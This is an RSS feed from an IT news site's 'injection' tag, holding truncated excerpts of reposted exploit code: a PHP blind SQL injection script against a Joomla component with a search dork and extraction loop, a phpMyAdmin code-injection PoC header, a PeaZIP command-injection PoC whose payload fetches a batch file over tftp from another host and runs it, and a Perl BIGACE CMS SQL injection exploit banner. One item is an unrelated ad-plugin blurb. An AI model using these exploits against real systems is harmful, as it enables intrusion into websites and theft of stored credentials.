<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>GO IT WORLD &#124; IT TECH &#124; IT NEWS &#187; injection</title>
	<atom:link href="http://www.goitworld.com/tag/injection/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.goitworld.com</link>
	<description>goitworld.com</description>
	<lastBuildDate>Tue, 10 Jan 2012 10:03:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.2</generator>
		<item>
		<title>Joomla Component com_joomlaconnect_be Blind Injection Vulnerability</title>
		<link>http://www.goitworld.com/joomla-component-com_joomlaconnect_be-blind-injection-vulnerability/</link>
		<comments>http://www.goitworld.com/joomla-component-com_joomlaconnect_be-blind-injection-vulnerability/#comments</comments>
		<pubDate>Fri, 26 Feb 2010 09:44:47 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/joomla-component-com_joomlaconnect_be-blind-injection-vulnerability/</guid>
		<description><![CDATA[<p style="float: right;margin: 4px;">


</p><p>Test Code</p>
<pre>

#!/usr/bin/php
  &#60;?php 

ini_set(&#34;max_execution_time&#34;,0); 

print_r(' 

########################################################################### 

[»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability 

########################################################################### 

[»] Script:&#160;&#160; [Joomla] 

[»] Language: [ PHP ] 

[»] Founder:&#160; [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc&#62; ] 

[»] Greetz to:[ Spécial &#62;&#62;&#62;&#62;His0k4 &#62;&#62;&#62;&#62;&#160;&#160; Tous les hackers Algérie 

[»] Dork: inurl:index.php?option=com_joomlaconnect_be 

########################################################################### 

########################################################################### 

# 

#&#160; Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit 

#&#160; [x] Usage: joomla.php &#34;<a href="http://url/index.php?option=com_joomlaconnect_be&#38;Itemid=53&#38;task=showBizPage&#38;id=3">http://url/index.php?option=com_joomlaconnect_be&#38;Itemid=53&#38;task=showBizPage&#38;id=3</a> 

# 

# 

########################################################################### 

'); 

if ($argc &#62; 1) { 

$url = $argv[1]; 

$r = strlen(file_get_contents($url.&#34;+and+1=1--&#34;)); 

echo &#34;\nExploiting:\n&#34;; 

$w = strlen(file_get_contents($url.&#34;+and+1=0--&#34;)); 

$t = abs((100-($w/$r*100))); 

echo &#34;Username: &#34;; 

for ($i=1; $i &#60;= 30; $i++) { 

$laenge</pre><p>&#8230; <a href="http://www.goitworld.com/joomla-component-com_joomlaconnect_be-blind-injection-vulnerability/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/joomla-component-com_joomlaconnect_be-blind-injection-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress Adsense Injection : Randomly Insert Ads in Posts</title>
		<link>http://www.goitworld.com/wordpress-adsense-injection-randomly-insert-ads-in-posts-2/</link>
		<comments>http://www.goitworld.com/wordpress-adsense-injection-randomly-insert-ads-in-posts-2/#comments</comments>
		<pubDate>Wed, 22 Jul 2009 09:28:11 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Wordpress Plugins]]></category>
		<category><![CDATA[google adsense]]></category>
		<category><![CDATA[injection]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/wordpress-adsense-injection-randomly-insert-ads-in-posts-2/</guid>
		<description><![CDATA[<p>Ad blindness is a common problem, which makes your visitors ignore your similar looking and always single position google adsense ads. <strong>Adsense Injection wordpress plugin</strong> will let you insert ads randomly in your post, reduce ad blindness and increase clicks.</p>
<p>Earlier I had pointed to another excellent <strong>AdSense Deluxe WordPress Plugin</strong>that lets you insert Google Adsense / Yahoo Ads into blog posts easily. But there were no random ads insertion and you decided where to insert the ads.</p>
<p>The new <a href="http://wordpress-plugins.biggnuts.com/adsense-plugin/"><strong>Adsense Injection wordpress plugin</strong></a> just <strong>takes a random paragraph break</strong> in your article and inserts google adsense code. It&#8230; <a href="http://www.goitworld.com/wordpress-adsense-injection-randomly-insert-ads-in-posts-2/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/wordpress-adsense-injection-randomly-insert-ads-in-posts-2/feed/</wfw:commentRss>
		<slash:comments>156</slash:comments>
		</item>
		<item>
		<title>phpMyAdmin PHP Code Injection Exploit</title>
		<link>http://www.goitworld.com/phpmyadmin-php-code-injection-exploit/</link>
		<comments>http://www.goitworld.com/phpmyadmin-php-code-injection-exploit/#comments</comments>
		<pubDate>Wed, 10 Jun 2009 05:38:29 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[phpmyadmin]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/phpmyadmin-php-code-injection-exploit/</guid>
		<description><![CDATA[<p># CVE-2009-1151: phpMyAdmin &#8216;/scripts/setup.php&#8217; PHP Code Injection RCE PoC v0.11    <br /># by pagvac (gnucitizen.org), 4th June 2009.     <br /># special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,     <br /># and to str0ke (milw0rm.com) for testing this PoC script and providing feedback! </p>
<p># PoC script successfully tested on the following targets:    <br /># phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1     <br /># Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2) </p>
<p># attack requirements:    <br /># 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5     <br /># and 3.x before 3.1.3.1 according to PMASA-2009-3     <br /># 2) it *seems*&#8230; <a href="http://www.goitworld.com/phpmyadmin-php-code-injection-exploit/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/phpmyadmin-php-code-injection-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PeaZIP commpressed filename command injection poc exploit</title>
		<link>http://www.goitworld.com/peazip-commpressed-filename-command-injection-poc-exploit/</link>
		<comments>http://www.goitworld.com/peazip-commpressed-filename-command-injection-poc-exploit/#comments</comments>
		<pubDate>Sun, 07 Jun 2009 11:56:17 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[peazip]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/peazip-commpressed-filename-command-injection-poc-exploit/</guid>
		<description><![CDATA[<p>PeaZIP &#60;= 2.6.1 commpressed filename command injection poc exploit   <br />by Nine:Situations:Group::pyrokinesis    <br />site: <a href="http://retrogod.altervista.org/">http://retrogod.altervista.org/</a>    <br />software site: <a href="http://peazip.sourceforge.net/">http://peazip.sourceforge.net/</a></p>
<p>tested against: peazip 2.5.1, 2.6.1 for Windows </p>
<p>a pipe vulnerability exists in the way peazip handles file entries,   <br />prepare the .zip file, open with it, then double click the compressed text file,    <br />a cmd shell is launched &#8230;</p>
<p>&#60;?php </p>
<p>#change, cannot use slashes or backslashes here   <br />$cmd = &#34;tftp 192.168.0.1 GET pyro pyro.bat &#38; pyro.bat&#34;; </p>
<p>class zipfile   <br />{    <br />&#160;&#160;&#160; var $datasec&#160;&#160;&#160;&#160;&#160; = array();    <br />&#160;&#160;&#160; var $ctrl_dir&#160;&#160;&#160;&#160; = array();    <br />&#160;&#160;&#160;&#8230; <a href="http://www.goitworld.com/peazip-commpressed-filename-command-injection-poc-exploit/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/peazip-commpressed-filename-command-injection-poc-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>BIGACE CMS 2.5 Remote SQL Injection Exploit</title>
		<link>http://www.goitworld.com/bigace-cms-25-remote-sql-injection-exploit/</link>
		<comments>http://www.goitworld.com/bigace-cms-25-remote-sql-injection-exploit/#comments</comments>
		<pubDate>Wed, 13 May 2009 13:11:58 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[bigace]]></category>
		<category><![CDATA[cms]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[sql]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/bigace-cms-25-remote-sql-injection-exploit/</guid>
		<description><![CDATA[<pre>#!/usr/bin/perl
#***********************************************************************************************
#***********************************************************************************************
#**	       										      **
#**  											      **
#**     [] [] []  [][][][&#62;  []     []  [][  ][]     []   [][]]  []  [&#62;  [][][][&#62;  [][][][]    **
#**     &#124;&#124; &#124;&#124; &#124;&#124;  []        [][]   []   []  []     []   []      [] []   []	  []    []    **
#   [&#62;  [][][][]  [][][][&#62;  [] []  []   []  []   [][]  []       [][]    [][][][&#62;  []    []    **
#**  [-----[]-----[][][][&#62;--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][&#62;--[][][][]---\
#**==[&#62;    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  &#62;&#62;--
#**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
#   [&#62;   [[[]]]   [][][][&#62;  [][]   [] [][[] [[]]  [][]  [][][]  []  [&#62;  [][][][&#62; &#60;][]   []
#**							                                      **
#**    											      **
#**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O</pre><p>&#8230; <a href="http://www.goitworld.com/bigace-cms-25-remote-sql-injection-exploit/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/bigace-cms-25-remote-sql-injection-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

